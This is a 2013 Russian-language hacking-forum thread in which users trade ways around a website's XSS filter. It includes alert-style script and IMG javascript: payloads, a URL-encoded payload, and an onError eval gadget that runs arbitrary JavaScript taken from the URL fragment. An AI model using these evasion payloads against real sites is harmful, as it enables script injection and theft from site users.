Xss-фильтр

Discussion in 'Уязвимости' started by Onths, 14 Feb 2013.

  1. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    Фильтр режет и ставит символы/пробелы.

    <sc ript>a lert()</sc ript>

    Теперь вот это:

    <IMG SRC="jav ascript:alert('XSS');">

    <IMG SRC="jav * ascript:a lert('XSS');">

    Быть может у кого-то есть опыт.
     
    #1 Onths, 14 Feb 2013
    Last edited: 14 Feb 2013
  2. FryTvin

    FryTvin New Member

    Joined:
    10 Nov 2012
    Messages:
    15
    Likes Received:
    2
    Reputations:
    6
    char code попробуй.
     
  3. RoksHD

    RoksHD New Member

    Joined:
    28 May 2012
    Messages:
    36
    Likes Received:
    3
    Reputations:
    2
    +1

    <script>alert(/XSS/)</script>

    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%58%53%53%2f%29%3c%2f%73%63%72%69%70%74%3e
     
  4. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    728
    Likes Received:
    26
    Reputations:
    -6
    base64 помогает бывает
     
  5. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    Преобразовывает и режет.
     
  6. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4
    В base режет - data. d ata
     
  7. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    388
    Likes Received:
    169
    Reputations:
    65
    <img src="#$@#*$&" onError="eval(decodeURIComponent(location.href).split('#')[1])" />

    + Добавь к адресной строке:

    #здесь твой яваскрипт код
     
    #7 |qbz|, 14 Feb 2013
    Last edited: 14 Feb 2013
    1 person likes this.
  8. Onths

    Onths New Member

    Joined:
    3 May 2012
    Messages:
    57
    Likes Received:
    2
    Reputations:
    -4

    Никакой реакции, довольно странно, учитывая жесткую фильтрацию.
     
  9. FryTvin

    FryTvin New Member

    Joined:
    10 Nov 2012
    Messages:
    15
    Likes Received:
    2
    Reputations:
    6
    А если формата SQL кода ? 0x ???
     
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Что за бред развели в теме? Сюда пример сайта, могу посмотреть в ПМ. Никто его взламывать не будет.
     
  11. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    Подскажите что здесь можно сделать?
    http://i078.radikal.ru/1303/14/ec62f094706e.png
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Для точного ответа нужен сайт. Модуль Joomla - com_cabinet, сейчас проверил на нескольких сайтах, XSS там не наблюдалось.
     
    #12 randman, 3 Mar 2013
    Last edited: 3 Mar 2013
Loading...